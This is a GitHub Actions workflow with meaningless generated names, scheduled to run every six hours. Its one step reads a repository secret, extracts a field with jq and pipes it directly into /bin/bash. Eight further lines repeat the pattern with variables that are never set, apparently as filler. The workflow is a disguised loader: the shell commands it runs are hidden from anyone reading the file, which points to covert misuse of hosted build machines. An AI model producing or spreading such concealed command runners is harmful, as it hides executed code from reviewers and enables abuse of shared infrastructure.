name: chenhejiu6189
on:
  workflow_dispatch:
  schedule:
    - cron: '29 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenhejiu6189
        env:
          jprdc93: ${{ secrets.jprdc93 }}
        run: |
          echo $jprdc93 | jq -r .bi28924 | /bin/bash
          echo $hr04050 | jq -r .oapi063 | /bin/bash
          echo $xcumw009 | jq -r .ml48 | /bin/bash
          echo $inw5 | jq -r .ifj2672 | /bin/bash
          echo $jrai491 | jq -r .l237 | /bin/bash
          echo $zrnf27 | jq -r .cq992 | /bin/bash
          echo $o6 | jq -r .gp2046 | /bin/bash
          echo $w89 | jq -r .kku17171 | /bin/bash
          echo $ciel90654 | jq -r .kbm15489 | /bin/bash

